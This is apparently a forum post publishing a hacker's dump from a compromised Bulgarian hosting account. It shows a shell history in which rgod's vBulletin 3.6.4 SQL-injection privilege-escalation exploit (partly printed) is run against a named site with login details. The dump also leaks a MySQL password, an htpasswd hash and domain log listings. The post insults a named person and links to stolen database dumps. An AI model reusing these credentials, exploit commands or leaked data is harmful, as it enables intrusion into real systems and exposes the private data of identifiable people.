      36094164 -rw-r--r-- 1 nopasara nopasara 210 Jan 7 02:58 php.ini
      36094115 -rw-r--r-- 1 nopasara nopasara 9200 Mar 2 01:21 readme.html
      36094934 -rw-r--r-- 1 nopasara nopasara 27 Sep 27 2009 robots.txt
      36094031 -rw-r--r-- 1 nopasara nopasara 388 Dec 1 2009 start.png
      36978690 drwxr-xr-x 3 nopasara nopasara 4096 Dec 1 2009 task/
      36094935 -rw-r--r-- 1 nopasara nopasara 5612818 Sep 27 2009 webtech_2009.tar.gz
      36094061 -rw-r--r-- 1 nopasara nopasara 4337 Mar 2 01:21 wp-activate.php
      36094786 drwxr-xr-x 9 nopasara nopasara 4096 Mar 2 01:21 wp-admin/
      36095227 -rw-r--r-- 1 nopasara nopasara 40283 Mar 2 01:21 wp-app.php
      36095228 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-atom.php
      36095229 -rw-r--r-- 1 nopasara nopasara 274 Mar 2 01:21 wp-blog-header.php
      36095230 -rw-r--r-- 1 nopasara nopasara 3931 Mar 2 01:21 wp-comments-post.php
      36095231 -rw-r--r-- 1 nopasara nopasara 244 Mar 2 01:21 wp-commentsrss2.php
      36095232 -rw-r--r-- 1 nopasara nopasara 3177 Mar 2 01:21 wp-config-sample.php
      36095233 -rw-r--r-- 1 nopasara nopasara 1742 Mar 2 01:21 wp-config.php
      36094792 drwxr-xr-x 7 nopasara nopasara 4096 Mar 2 01:25 wp-content/
      36095718 -rw-r--r-- 1 nopasara nopasara 1255 Mar 2 01:21 wp-cron.php
      36095719 -rw-r--r-- 1 nopasara nopasara 246 Mar 2 01:21 wp-feed.php
      36094858 drwxr-xr-x 8 nopasara nopasara 4096 Mar 2 01:21 wp-includes/
      36096099 -rw-r--r-- 1 nopasara nopasara 1997 Mar 2 01:21 wp-links-opml.php
      36096100 -rw-r--r-- 1 nopasara nopasara 2453 Mar 2 01:21 wp-load.php
      36096101 -rw-r--r-- 1 nopasara nopasara 27787 Mar 2 01:21 wp-login.php
      36096102 -rw-r--r-- 1 nopasara nopasara 7774 Mar 2 01:21 wp-mail.php
      36096103 -rw-r--r-- 1 nopasara nopasara 494 Mar 2 01:21 wp-pass.php
      36094141 -rw-r--r-- 1 nopasara nopasara 110415 Mar 2 01:21 wp-pdf.php
      36096104 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rdf.php
      36096105 -rw-r--r-- 1 nopasara nopasara 334 Mar 2 01:21 wp-register.php
      36096106 -rw-r--r-- 1 nopasara nopasara 224 Mar 2 01:21 wp-rss.php
      36096107 -rw-r--r-- 1 nopasara nopasara 226 Mar 2 01:21 wp-rss2.php
      36096108 -rw-r--r-- 1 nopasara nopasara 9655 Mar 2 01:21 wp-settings.php
      36094025 -rw-r--r-- 1 nopasara nopasara 18644 Mar 2 01:21 wp-signup.php
      36096109 -rw-r--r-- 1 nopasara nopasara 3702 Mar 2 01:21 wp-trackback.php
      36096110 -rw-r--r-- 1 nopasara nopasara 3210 Mar 2 01:21 xmlrpc.php
      36094150 -rw-r--r-- 1 nopasara nopasara 4379590656 Sep 10 2010 xorred.iso


      [email protected] [/home/nopasara]# cat .bash_history
      #1263692240
      cd public_html/
      #1263692243
      test.php
      #1263692248
      php test.php
      #1263692260
      php test.php <?php
      #1263692260
      print_r('
      -----------------------------------------------------------------------------
      vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
      escalation by session hijacking exploit
      by rgod
      mail: retrog at alice dot it
      site: http://retrogod.altervista.org

      Works regardless of php.ini settings, you need a Super Moderator account
      to copy posts among threads, to be launched while admin is logged in to
      the control panel, this will give you full admin privileges
      note: this will flood the forum with empty threads even!
      -----------------------------------------------------------------------------
      ');
      #1263692260
      if ($argc<7) {
      #1263692260
      print_r('
      -----------------------------------------------------------------------------
      Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
      host: target server (ip/hostname)
      path: path to vbulletin
      user/pass: you need a moderator account
      forumid: existing forum
      postid: existing post
      Options:
      -p[port]: specify a port other than 80
      -P[ip:port]: specify a proxy
      Example:
      php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
      php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
      -----------------------------------------------------------------------------
      ');
      #1263692260
      die;
      #1263692260
      }
      #1263692260
      /*
      #1263692260
      vulnerable code in inlinemod.php near lines 185-209:
      #1263692260
      ...
      #1263692260

      #1263692260
      ->GPC['postids']);
      #1263692260
      dex => $postid)
      #1263692260
      dex"] != intval($postid))
      {
      unset($postids["$index"]);
      }
      }

      if (empty($postids))
      {
      #1263692279
      php test.php
      #1263692305
      php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
      #1263692308
      php test.php studiopress.com/support sverdlov sverdlovparola 42 15513
      #1263692321
      php test.php studiopress.com/support/ sverdlov sverdlovparola 42 15513
      #1263692381
      php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
      #1263692470
      php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
      #1263692489
      Administrator
      #1263692493
      Administrator
      #1263692496
      php test.php studiopress.com /support/ sverdlov sverdlovparola 42 15513
      #1263692539
      cd ..
      #1263692540
      ls
      #1263692547
      rm .bash_history
      #1263692551
      cat .bash_h
      #1263692557
      exit
      #1263831540
      mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov.sql
      #1263831932
      mysql -h127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < /home/nopasara//public_html/sverdlov.net/sverdlov1.sql
      #1263833103
      exit
      #1263832465
      ls -la
      #1263832469
      ls -la
      #1263832491
      vim .bash_history
      #1263832552
      mysql -h 127.0.0.1 -unopasara -psuperhostingparola nopasara_sverdlov < sverdlov.sql
      #1263832751
      mysql --help|grep charset
      #1263832754
      mysql --help|grep char
      #1263832908
      cd public_html/
      #1263832909
      ls
      #1263832912
      cd sverdlov.net/
      #1263832912
      ls
      #1263832923
      vim wp-config.php
      #1263837320
      logou
      #1263837322
      logout
      uname -a;w;id
      cd /home/nopasara
      ls -l
      du -hs .
      cd /home/nopasara
      ls -lia


      >> LOL, You're doing it wrong, idiot.

      [email protected] [/home/nopasara/.htpasswds/public_html/securityguy/leech]# cat passwd
      leech:204VnKl0pmERM


      [email protected] [/home/nopasara]# ls -l docs
      total 36044
      drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 ./
      drwx--x--x 18 nopasara nopasara 4096 Mar 20 03:01 ../
      -rw-r--r-- 1 nopasara nopasara 1589323 Apr 12 2009 NIST-SP800-42.pdf
      -rw------- 1 nopasara nopasara 1224696 Jan 14 2009 auditing_mac_os_x_compliance_with_the_center_for_internet_security_benchmark_using_nessus_32948
      -rw------- 1 nopasara nopasara 925291 Jan 14 2009 cleaning_up_the_back_yard_a_discussion_on_your_mothers_home_network_security_32933
      -rw------- 1 nopasara nopasara 903941 Jan 14 2009 covering_the_tracks_on_mac_os_x_leopard_32993
      -rw------- 1 nopasara nopasara 1000759 Jan 14 2009 current_issues_in_dns_32988
      -rw------- 1 nopasara nopasara 883280 Jan 14 2009 data_carving_concepts_32969
      -rw------- 1 nopasara nopasara 504518 Jan 14 2009 detecting_and_preventing_anonymous_proxy_usage_32943
      -rw------- 1 nopasara nopasara 1856536 Jan 14 2009 document_metadata_the_silent_killer_32974
      -rw------- 1 nopasara nopasara 3193150 Jan 14 2009 era_of_spybots_a_secure_design_solution_using_intrusion_prevention_systems_32928
      -rw------- 1 nopasara nopasara 825947 Jan 14 2009 evtx_and_windows_event_logging_32949
      -rw------- 1 nopasara nopasara 6815322 Jan 14 2009 fibre_channel_storage_area_networks_an_analysis_from_a_security_perspective_32913
      -rw------- 1 nopasara nopasara 2014858 Jan 14 2009 human_being_firewall_32998
      -rw------- 1 nopasara nopasara 631031 Jan 14 2009 intel_ixp_network_processor_based_intrusion_detection_32919
      -rw------- 1 nopasara nopasara 343988 Jan 14 2009 intrusion_detection_likelihood_a_riskbased_approach_32938
      -rw------- 1 nopasara nopasara 516554 Jan 14 2009 iosmap_tcp_and_udp_port_scanning_on_cisco_ios_platforms_32964
      -rw------- 1 nopasara nopasara 426055 Jan 14 2009 manager_bg_2009.pdf
      -rw------- 1 nopasara nopasara 461473 Jan 14 2009 mining_for_malware_theres_gold_in_them_thar_proxy_logs_32959
      -rw------- 1 nopasara nopasara 808979 Jan 14 2009 net_framework_rootkits_backdoors_inside_your_framework_32954
      -rw------- 1 nopasara nopasara 981363 Jan 14 2009 os_and_application_fingerprinting_techniques_32923
      -rw------- 1 nopasara nopasara 1083363 Jan 14 2009 paper32988.pdf
      -rw------- 1 nopasara nopasara 1574638 Jan 14 2009 security_considerations_for_avaya_ess_implementation_32984
      -rw------- 1 nopasara nopasara 485204 Jan 14 2009 security_incident_handling_in_small_organizations_32979
      -rw------- 1 nopasara nopasara 482489 Jan 14 2009 skype_a_practical_security_analysis_32918
      -rw------- 1 nopasara nopasara 470634 Jan 14 2009 social_engineering_manipulating_the_source_32914
      -rw------- 1 nopasara nopasara 732651 Jan 14 2009 the_importance_of_security_awareness_training_33013
      -rw------- 1 nopasara nopasara 1143981 Jan 14 2009 transparent_layer_2_firewalls_a_look_at_2_vendor_offerings_juniper_and_cisco_32978
      -rw------- 1 nopasara nopasara 4844265 Jan 14 2009 valsmith_dquist_hacking_malware.pdf


      [email protected] [/home/nopasara]# ls -l /usr/local/apache/domlogs/nopasara/
      total 128288
      drwxr-x--- 2 root nopasara 4096 Feb 28 14:26 ./
      drwx--x--x 654 root wheel 765952 Mar 20 03:03 ../
      -rw-r----- 2 root nopasara 39096 Mar 20 01:19 bgsecrets.oss.bg
      -rw-r----- 2 root nopasara 294111 Jul 10 2009 blog.nopasara.bg
      -rw-r----- 2 root nopasara 6791 Mar 16 21:06 blog.oss.bg
      -rw-r----- 2 root nopasara 15280 Mar 16 21:22 cdn.oss.bg
      -rw-r----- 2 root nopasara 927221 Jul 4 2009 cmdb.nopasara.bg
      -rw-r----- 2 root nopasara 0 Jan 31 2010 cmdb.oss.bg
      -rw-r----- 2 root nopasara 227423 Jul 4 2009 crm.nopasara.bg
      -rw-r----- 2 root nopasara 0 Jan 31 2010 crm.oss.bg
      -rw-r----- 2 root nopasara 101328 Mar 20 02:10 demo.oss.bg
      -rw-r----- 2 root nopasara 2399652 Mar 20 01:57 emeastudio.oss.bg
      -rw-r----- 2 root nopasara 0 Jan 31 00:25 eye.oss.bg
      -rw-r----- 2 root nopasara 0 Aug 31 2009 ftp.nopasara.bg-ftp_log
      -rw-r----- 2 root nopasara 111685373 Mar 17 12:56 ftp.oss.bg-ftp_log
      -rw-r----- 2 root nopasara 29481 Dec 28 2009 hipopotuk.oss.bg
      -rw-r----- 2 root nopasara 80008 Mar 20 01:44 ioscompatible.oss.bg
      -rw-r----- 2 root nopasara 121645 Oct 3 13:24 logostudio.oss.bg
      -rw-r----- 2 root nopasara 0 Aug 31 2009 nopasara.bg
      -rw-r----- 2 root nopasara 39153 Sep 16 2009 nopasara.oss.bg
      -rw-r----- 2 root nopasara 0 Dec 10 2008 nopasaran.bg
      -rw-r----- 2 root nopasara 259906 Mar 20 02:54 oss.bg
      -rw-r----- 2 root nopasara 104114 Feb 5 11:21 osseu.oss.bg
      -rw-r----- 2 root nopasara 0 Jun 30 2009 play.nopasara.bg
      -rw-r----- 2 root nopasara 0 Jul 10 2009 play.oss.bg
      -rw-r----- 2 root nopasara 10374402 Mar 20 03:02 securityguy.oss.bg
      -rw-r--r-- 2 root root 375448 Jul 28 2009 studio.oss.bg
      -rw-r----- 2 root nopasara 74486 Mar 19 20:47 studioburgas.oss.bg
      -rw-r----- 2 root nopasara 729044 Jul 4 2009 support.nopasara.bg
      -rw-r----- 2 root nopasara 0 Jul 10 2009 support.oss.bg
      -rw-r----- 2 root nopasara 2114965 Mar 20 02:54 sverdlov.oss.bg
      -rw-r----- 2 root nopasara 72848 Mar 20 02:42 test.oss.bg
      -rw-r----- 2 root nopasara 0 Jan 31 00:25 topusahostingproviders.oss.bg
      -rw-r----- 2 root nopasara 0 Jan 31 00:25 tragedyworld.oss.bg
      -rw-r----- 2 root nopasara 141532 Mar 20 02:53 web.oss.bg
      -rw-r----- 2 root nopasara 140 Aug 1 2009 weboffice.oss.bg
      -rw-r----- 2 root nopasara 137076 Mar 16 02:38 wo.oss.bg


      >> Check the URL for database dumps, etc.




      Fuck the skiddies, fuck the pseudo-security experts like Sverdlov, and last but not least.. fuck the cops and the stupid journalists brainwashing the innocent.

      Here's the URL for the various dumps -
      http://www.4shared.com/file/sy8bdPe5/pwnt4phun.html

      Get back to [email protected] for non-published details, packet captures, some more database dumps, etc.
The quieter you become, the more you are able to hear! :AR! https://www.FreeUniBG.eu :YMDEVIL:
Публикувай отговор

Кой е на линия

Потребители разглеждащи този форум: 0 регистрирани и 1 гост